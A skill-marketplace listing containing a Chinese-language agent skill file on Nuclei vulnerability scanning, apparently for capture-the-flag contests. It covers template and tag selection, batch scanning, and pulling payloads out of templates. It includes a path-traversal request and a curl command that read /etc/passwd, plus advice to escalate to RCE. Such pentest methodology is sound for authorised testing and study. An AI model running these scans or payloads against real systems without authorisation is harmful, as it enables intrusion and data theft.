Now liveThe Skillselion MCP - thousands of ranked skills, loaded into your agent mid-task. No install.Get it →
wgpsec avatar

Nuclei Scan

  • 34 installs
  • 1.6k repo stars
  • Updated July 19, 2026
  • wgpsec/aboutsecurity

Helps with ai & agent building tasks during AI-assisted development.

About

nuclei-scan is a Claude Code skill for ai & agent building. It helps solo builders move faster with AI-assisted coding.

  • nuclei-scan
  • AI & Agent Building
  • AI-coding skill

Nuclei Scan by the numbers

  • 34 all-time installs (skills.sh)
  • +4 installs in the week ending Jul 27, 2026 (Skillselion tracking)
  • Ranked #8,822 of 16,546 AI & Agent Building skills by installs in the Skillselion catalog
  • Data as of Aug 5, 2026 (Skillselion catalog sync)
npx skills add https://github.com/wgpsec/aboutsecurity --skill nuclei-scan

Add your badge

Show developers this skill is listed on Skillselion. Paste this into your README.

Listed on Skillselion
Installs34
repo stars1.6k
Last updatedJuly 19, 2026
Repositorywgpsec/aboutsecurity

What it does

Helps with ai & agent building tasks during AI-assisted development.

Files

SKILL.mdMarkdownGitHub ↗

Nuclei 漏洞扫描方法论

Nuclei 是 ProjectDiscovery 开源的基于模板的漏洞扫描器。它的核心价值:社区维护的模板库,每个模板都是经过验证的 PoC,比自己构造 payload 更可靠。

扫描策略

Nuclei 有 9000+ 模板,不加限制的全量扫描(nuclei -u target)需要 10-30 分钟——在比赛中这是致命的时间浪费。通过 -t(指定模板目录)或 -tags(指定标签)缩小范围,通常几十秒内就能完成精准扫描。

另外,Nuclei 的模板匹配并非 100% 准确,关键漏洞发现后应手动复现确认,避免在误报上浪费时间。

Phase 1: 精准扫描(推荐)

根据指纹识别结果选择对应模板,而非全量扫描:

# 1. 按模板 ID / CVE 编号精确扫描(最快,秒级)
nuclei -u http://target -id CVE-2021-44228

# 2. 按产品名过滤(几十秒)
nuclei -u http://target -t cves/ -tags apache
nuclei -u http://target -t cves/ -tags tomcat
nuclei -u http://target -t cves/ -tags wordpress

# 3. 只扫高危 CVE(1-3 分钟)
nuclei -u http://target -t cves/ -severity critical,high

# 4. 按漏洞类型扫描
nuclei -u http://target -t vulnerabilities/ -tags rce
nuclei -u http://target -t vulnerabilities/ -tags sqli
nuclei -u http://target -t vulnerabilities/ -tags lfi

常用模板目录

目录内容适用场景
cves/已知 CVE PoCZone 2 CVE 验证
vulnerabilities/通用漏洞检测Web 深度测试
misconfiguration/配置错误云安全、服务加固
default-logins/默认口令中间件管理后台
exposures/敏感信息泄露信息收集阶段
takeovers/子域名接管域名资产攻击

Phase 2: 模板搜索与提取 Payload

当需要手动利用(nuclei 直接扫不出来、需要定制 payload)时,从模板中提取关键信息:

# 搜索本地模板库
find ~/nuclei-templates/ -name "*CVE-2021-42013*" 2>/dev/null
find ~/nuclei-templates/ -name "*apache*" -path "*/cves/*" 2>/dev/null
find ~/nuclei-templates/ -name "*log4j*" 2>/dev/null

# 按关键词在模板内容中搜索
grep -rl "apache 2.4.49" ~/nuclei-templates/http/cves/ 2>/dev/null
grep -rl "tomcat.*rce" ~/nuclei-templates/http/cves/ 2>/dev/null

# 读取模板提取 payload
cat ~/nuclei-templates/http/cves/2021/CVE-2021-42013.yaml

模板关键字段解读

# 模板结构示例
id: CVE-2021-42013
info:
  name: Apache HTTP Server Path Traversal
  severity: critical           # ← 漏洞等级
  description: ...             # ← 漏洞描述和利用条件

http:
  - raw:                       # ← 原始 HTTP 请求(可直接提取用于 curl)
      - |
        GET /cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:                  # ← 成功判定条件
      - type: regex
        regex:
          - "root:.*:0:0:"

    extractors:                # ← 提取的数据(如版本号、密钥)
      - type: regex
        regex:
          - "root:.*"

从模板提取 payload 用于手动利用

# 从 raw 字段提取请求路径和方法
cat template.yaml | grep -A5 "raw:" 

# 转换为 curl 命令
curl -s "http://target/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"

# 如果模板有 POST body
curl -s -X POST http://target/api -d '{"payload": "..."}'

Phase 3: 批量目标扫描

当有多个目标时:

# 从文件读取目标列表
echo "http://target1" > targets.txt
echo "http://target2" >> targets.txt
nuclei -l targets.txt -t cves/ -severity critical,high

# 配合 httpx 管道
cat urls.txt | httpx -silent | nuclei -t cves/ -severity critical,high

Phase 4: 结果分析与验证

Nuclei 输出格式:

[CVE-2021-42013] [http] [critical] http://target/cgi-bin/.%2e/...
[CVE-2022-26134] [http] [critical] http://target/wiki/%24%7B...%7D

必须手动验证关键发现: 1. 复现 nuclei 报告的请求,确认不是误报 2. 检查利用条件是否满足(如 mod_cgi 是否启用) 3. 尝试从信息泄露升级到 RCE

常用标签速查

标签说明示例
cve所有 CVE-tags cve
rce远程代码执行-tags rce
sqliSQL 注入-tags sqli
lfi本地文件包含-tags lfi
ssrfSSRF-tags ssrf
xssXSS-tags xss
default-login默认口令-tags default-login
exposure信息泄露-tags exposure
apacheApache 相关-tags apache
tomcatTomcat 相关-tags tomcat
wordpressWordPress-tags wordpress
jenkinsJenkins-tags jenkins
springSpring 框架-tags spring

性能优化参数

# 控制并发(默认 25,目标少时可降低避免被 ban)
nuclei -u http://target -t cves/ -c 10

# 限制速率
nuclei -u http://target -t cves/ -rl 50  # 每秒 50 请求

# 超时设置
nuclei -u http://target -t cves/ -timeout 10

# 只输出发现的漏洞(静默模式)
nuclei -u http://target -t cves/ -silent

# 输出到文件(JSON 格式便于分析)
nuclei -u http://target -t cves/ -json -o results.json

Related skills

This week in AI coding

Five minutes, every Monday - the tools, releases and tactics for developers.

unsubscribe anytime.